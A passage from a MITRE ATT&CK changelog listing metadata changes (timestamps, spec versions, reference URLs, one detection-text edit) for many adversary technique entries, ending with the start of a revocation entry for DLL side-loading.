| modified | 2024-08-21 16:19:55.082000+00:00 | 2025-04-15 22:57:26.573000+00:00 |
| external_references[3]['description'] | Fernández, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved June 26, 2020. | Fernández, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://x-c3ll.github.io/posts/PAM-backdoor-DNS/ | https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/ |
[T1003.007] OS Credential Dumping: Proc Filesystem
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 15:13:32.253000+00:00 | 2025-04-15 22:57:59.661000+00:00 |
[T1597.002] Search Closed Sources: Purchase Technical Data
Current version: 1.0
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-04-15 03:44:43.900000+00:00 | 2025-04-15 22:58:36.430000+00:00 |
[T1012] Query Registry
Current version: 1.3
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-04-03 18:56:37.011000+00:00 | 2025-04-15 22:58:50.612000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1563.002] Remote Service Session Hijacking: RDP Hijacking
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-08-14 15:37:02.771000+00:00 | 2025-04-15 22:59:04.979000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1498.002] Network Denial of Service: Reflection Amplification
Current version: 1.4
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:04:34.495000+00:00 | 2025-04-15 22:59:22.782000+00:00 |
[T1114.002] Email Collection: Remote Email Collection
Current version: 1.3
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:59:50.429000+00:00 |
[T1563] Remote Service Session Hijacking
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-02-26 14:21:37.818000+00:00 | 2025-04-15 23:00:02.178000+00:00 |
| external_references[2]['description'] | Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved February 17, 2020. | Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident | https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/ |
[T1496] Resource Hijacking
Current version: 2.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-13 17:00:09.759000+00:00 | 2025-04-15 23:00:21.372000+00:00 |
[T1556.005] Modify Authentication Process: Reversible Encryption
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-08-26 15:40:31.871000+00:00 | 2025-04-15 23:00:34.242000+00:00 |
[T1036.002] Masquerading: Right-to-Left Override
Current version: 1.1
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-10-14 21:01:59.733000+00:00 | 2025-04-15 23:00:50.575000+00:00 |
[T1565.003] Data Manipulation: Runtime Data Manipulation
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 18:21:43.760000+00:00 | 2025-04-15 23:01:11.644000+00:00 |
| external_references[2]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024. |
[T1606.002] Forge Web Credentials: SAML Tokens
Current version: 1.4
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 23:01:25.698000+00:00 |
| external_references[5]['description'] | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021. | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved November 17, 2024. |
| external_references[5]['url'] | https://www.sygnia.co/golden-saml-advisory | https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/ |
[T1608.006] Stage Capabilities: SEO Poisoning
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-08-14 15:03:56.383000+00:00 | 2025-04-15 23:01:38.651000+00:00 |
[T1496.003] Resource Hijacking: SMS Pumping
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-16 17:45:14.210000+00:00 | 2025-04-15 23:02:00.718000+00:00 |
[T1505.001] Server Software Component: SQL Stored Procedures
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:05:24.007000+00:00 | 2025-04-15 23:02:13.653000+00:00 |
[T1596.005] Search Open Technical Databases: Scan Databases
Current version: 1.0
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-04-15 03:49:49.260000+00:00 | 2025-04-15 23:02:32.145000+00:00 |
[T1595.001] Active Scanning: Scanning IP Blocks
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 13:46:55.039000+00:00 | 2025-04-15 23:02:44.660000+00:00 |
[T1029] Scheduled Transfer
Current version: 1.1
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2020-03-28 00:26:48.769000+00:00 | 2025-04-15 23:03:03.336000+00:00 |
[T1113] Screen Capture
Current version: 1.1
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-03-30 21:01:39.967000+00:00 | 2025-04-15 23:03:14.254000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1597] Search Closed Sources
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-04 13:12:14.469000+00:00 | 2025-04-15 23:03:31.068000+00:00 |
[T1593.002] Search Open Websites/Domains: Search Engines
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-09-12 19:19:47.758000+00:00 | 2025-04-15 23:03:45.401000+00:00 |
[T1596] Search Open Technical Databases
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-10-18 22:45:19.607000+00:00 | 2025-04-15 23:04:02.249000+00:00 |
| external_references[4]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | NTT America. (n.d.). Whois Lookup. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.whois.net/ | https://who.is/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1593] Search Open Websites/Domains
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-09-12 19:19:47.759000+00:00 | 2025-04-15 23:04:23.505000+00:00 |
[T1594] Search Victim-Owned Websites
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-02 18:52:21.278000+00:00 | 2025-04-15 23:04:36.505000+00:00 |
[T1003.002] OS Credential Dumping: Security Account Manager
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:40:52.174000+00:00 | 2025-04-15 23:04:51.689000+00:00 |
[T1518.001] Software Discovery: Security Software Discovery
Current version: 1.5
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-04-16 00:15:53.303000+00:00 | 2025-04-15 23:05:09.449000+00:00 |
[T1555.002] Credentials from Password Stores: Securityd Memory
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:41:18.638000+00:00 | 2025-04-15 23:05:25.349000+00:00 |
| external_references[3]['description'] | Juuso Salonen. (2012, September 5). Breaking into the OS X keychain. Retrieved July 15, 2017. | Juuso Salonen. (2012, September 5). Breaking into the OS X keychain. Retrieved November 17, 2024. |
| external_references[3]['url'] | http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain | https://web.archive.org/web/20130106164109/https://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain |
[T1583.004] Acquire Infrastructure: Server
Current version: 1.3
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-02-28 21:22:52.176000+00:00 | 2025-04-15 23:05:58.721000+00:00 |
| external_references[4]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/ |
[T1584.004] Compromise Infrastructure: Server
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-01-31 20:05:44.075000+00:00 | 2025-04-15 23:05:41.313000+00:00 |
| external_references[3]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/ |
[T1583.007] Acquire Infrastructure: Serverless
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-07-01 20:24:16.562000+00:00 | 2025-04-15 23:06:30.913000+00:00 |
[T1584.007] Compromise Infrastructure: Serverless
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-03 14:18:34.045000+00:00 | 2025-04-15 23:06:14.037000+00:00 |
[T1499.002] Endpoint Denial of Service: Service Exhaustion Flood
Current version: 1.4
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:05:48.014000+00:00 | 2025-04-15 23:06:48.799000+00:00 |
[T1213.002] Data from Information Repositories: Sharepoint
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 23:07:18.929000+00:00 |
[T1593.001] Search Open Websites/Domains: Social Media
Current version: 1.0
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-04-15 03:52:40.958000+00:00 | 2025-04-15 23:08:29.336000+00:00 |
[T1586.001] Compromise Accounts: Social Media Accounts
Current version: 1.1
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-10-16 17:15:12.169000+00:00 | 2025-04-15 23:08:45.478000+00:00 |
[T1585.001] Establish Accounts: Social Media Accounts
Current version: 1.1
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-10-16 17:37:34.563000+00:00 | 2025-04-15 23:09:01.225000+00:00 |
[T1205.002] Traffic Signaling: Socket Filters
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-10-20 19:56:18.579000+00:00 | 2025-04-15 23:09:39.651000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1592.002] Gather Victim Host Information: Software
Current version: 1.1
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-10-17 16:33:19.596000+00:00 | 2025-04-15 23:09:53.612000+00:00 |
[T1566.001] Phishing: Spearphishing Attachment
Current version: 2.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:42:01.552000+00:00 | 2025-04-15 23:10:26.686000+00:00 |
| external_references[1]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024. |
| external_references[4]['description'] | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020. | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql | https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql |
[T1598.003] Phishing for Information: Spearphishing Link
Current version: 1.6
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-05-31 04:18:44.567000+00:00 | 2025-04-15 23:10:59.931000+00:00 |
| external_references[1]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024. |
| external_references[11]['description'] | Ryte Wiki. (n.d.). Retrieved March 5, 2024. | Ryte Wiki. (n.d.). Retrieved November 17, 2024. |
| external_references[11]['url'] | https://en.ryte.com/wiki/Tracking_Pixel | https://en.ryte.com/wiki/Tracking_Pixel/ |
[T1566.002] Phishing: Spearphishing Link
Current version: 2.7
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:06:32.591000+00:00 | 2025-04-15 23:10:41.326000+00:00 |
| external_references[1]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024. |
[T1598.001] Phishing for Information: Spearphishing Service
Current version: 1.0
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-04-15 03:43:12.843000+00:00 | 2025-04-15 23:11:18.959000+00:00 |
[T1598.004] Phishing for Information: Spearphishing Voice
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-09-08 21:03:35.477000+00:00 | 2025-04-15 23:11:31.420000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1566.003] Phishing: Spearphishing via Service
Current version: 2.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 15:16:30.272000+00:00 | 2025-04-15 23:11:50.622000+00:00 |
[T1562.011] Impair Defenses: Spoof Security Alerting
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-16 20:12:44.962000+00:00 | 2025-04-15 23:12:05.813000+00:00 |
[T1608] Stage Capabilities
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-10-19 22:01:05.551000+00:00 | 2025-04-15 23:12:21.613000+00:00 |
| external_references[9]['description'] | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020. | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved November 17, 2024. |
| external_references[9]['url'] | https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html | https://web.archive.org/web/20201024230407/https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1539] Steal Web Session Cookie
Current version: 1.4
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 23:12:39.075000+00:00 |
[T1649] Steal or Forge Authentication Certificates
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 23:12:50.646000+00:00 |
[T1027.003] Obfuscated Files or Information: Steganography
Current version: 1.2
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-03-30 21:01:48.815000+00:00 | 2025-04-15 23:13:05.893000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1565.001] Data Manipulation: Stored Data Manipulation
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-08-26 16:33:33.982000+00:00 | 2025-04-15 23:13:20.667000+00:00 |
| external_references[2]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024. |
[T1195] Supply Chain Compromise
Current version: 1.6
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-04 11:17:00.778000+00:00 | 2025-04-15 23:13:41.905000+00:00 |
| external_references[2]['description'] | Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018. | Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.commandfive.com/papers/C5_APT_SKHack.pdf | https://web.archive.org/web/20160309235002/https://www.commandfive.com/papers/C5_APT_SKHack.pdf |
| external_references[4]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
[T1216.002] System Script Proxy Execution: SyncAppvPublishingServer
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-09-12 19:42:21.547000+00:00 | 2025-04-15 23:13:55.573000+00:00 |
[T1614] System Location Discovery
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:07:23.511000+00:00 | 2025-04-15 23:14:16.731000+00:00 |
[T1007] System Service Discovery
Current version: 1.5
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-04-03 18:55:18.326000+00:00 | 2025-04-15 23:14:33.837000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1548.006] Abuse Elevation Control Mechanism: TCC Manipulation
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-16 16:54:56.714000+00:00 | 2025-04-15 23:14:58.393000+00:00 |
[T1548.005] Abuse Elevation Control Mechanism: Temporary Elevated Cloud Access
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:07:49.519000+00:00 | 2025-04-15 23:15:17.608000+00:00 |
[T1505.005] Server Software Component: Terminal Services DLL
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-09-12 19:40:42.810000+00:00 | 2025-04-15 23:15:45.110000+00:00 |
| x_mitre_detection | Monitor for changes to Registry keys associated with ServiceDll and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\ . Monitor unexpected changes and/or interactions with termsrv.dll , which is typically stored in %SystemRoot%\System32\ . Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe ) or modify/replace the legitimate termsrv.dll . Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs ) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll , though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload). | Monitor for changes to Registry keys associated with ServiceDll and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\ . Monitor unexpected changes and/or interactions with termsrv.dll , which is typically stored in %SystemRoot%\System32\ . Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe ) or modify/replace the legitimate termsrv.dll . Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs ) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll , though an adversary could also use [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload). |
[T1597.001] Search Closed Sources: Threat Intel Vendors
Current version: 1.0
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-04-15 03:45:30.862000+00:00 | 2025-04-15 23:16:02.261000+00:00 |
[T1588.002] Obtain Capabilities: Tool
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-09-16 16:20:16.431000+00:00 | 2025-04-15 23:16:21.007000+00:00 |
[T1537] Transfer Data to Cloud Account
Current version: 1.5
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:08:25.344000+00:00 | 2025-04-15 23:16:36.472000+00:00 |
| external_references[6]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024. |
| external_references[6]['url'] | https://www.justice.gov/file/1080281/download | https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf |
[T1565.002] Data Manipulation: Transmitted Data Manipulation
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-08-26 16:33:33.983000+00:00 | 2025-04-15 23:16:50.965000+00:00 |
| external_references[2]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024. |
[T1199] Trusted Relationship
Current version: 2.4
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:08:39.968000+00:00 | 2025-04-15 23:17:12.008000+00:00 |
[T1546.017] Event Triggered Execution: Udev Rules
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-11-11 19:05:38.708000+00:00 | 2025-04-15 23:17:25.978000+00:00 |
[T1535] Unused/Unsupported Cloud Regions
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-12-14 16:28:24.680000+00:00 | 2025-04-15 23:17:42.649000+00:00 |
[T1608.001] Stage Capabilities: Upload Malware
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-16 20:13:40.501000+00:00 | 2025-04-15 23:17:57.194000+00:00 |
[T1608.002] Stage Capabilities: Upload Tool
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-10-20 20:16:32.599000+00:00 | 2025-04-15 23:18:15.337000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1583.003] Acquire Infrastructure: Virtual Private Server
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 13:22:11.113000+00:00 | 2025-04-15 23:18:46.651000+00:00 |
| external_references[3]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/ |
[T1584.003] Compromise Infrastructure: Virtual Private Server
Current version: 1.1
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-10-17 15:59:02.770000+00:00 | 2025-04-15 23:19:04.087000+00:00 |
| external_references[3]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/ |
[T1588.006] Obtain Capabilities: Vulnerabilities
Current version: 1.0
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-04-15 03:16:32.119000+00:00 | 2025-04-15 23:19:21.267000+00:00 |
[T1595.002] Active Scanning: Vulnerability Scanning
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 13:37:31.317000+00:00 | 2025-04-15 23:19:33.981000+00:00 |
[T1596.002] Search Open Technical Databases: WHOIS
Current version: 1.0
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-04-15 03:50:44.113000+00:00 | 2025-04-15 23:20:02.082000+00:00 |
| external_references[1]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | NTT America. (n.d.). Whois Lookup. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.whois.net/ | https://who.is/ |
[T1606.001] Forge Web Credentials: Web Cookies
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-09-19 21:25:10.511000+00:00 | 2025-04-15 23:20:22.744000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1584.006] Compromise Infrastructure: Web Services
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:44:09.114000+00:00 | 2025-04-15 23:20:42.131000+00:00 |
[T1016.002] System Network Configuration Discovery: Wi-Fi Discovery
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-10-05 11:35:30.887000+00:00 | 2025-04-15 23:21:00.705000+00:00 |
[T1555.004] Credentials from Password Stores: Windows Credential Manager
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:44:35.906000+00:00 | 2025-04-15 23:21:30.628000+00:00 |
[T1222.001] File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-04-21 12:27:04.900000+00:00 | 2025-04-15 23:21:45.352000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1021.006] Remote Services: Windows Remote Management
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-09-12 15:28:23.398000+00:00 | 2025-04-15 23:22:03.699000+00:00 |
[T1595.003] Active Scanning: Wordlist Scanning
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-04-15 19:10:23.838000+00:00 | 2025-04-15 23:22:19.165000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Revocations
[T1574.002] Hijack Execution Flow: DLL Side-Loading
Current version: 2.1
Description:
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
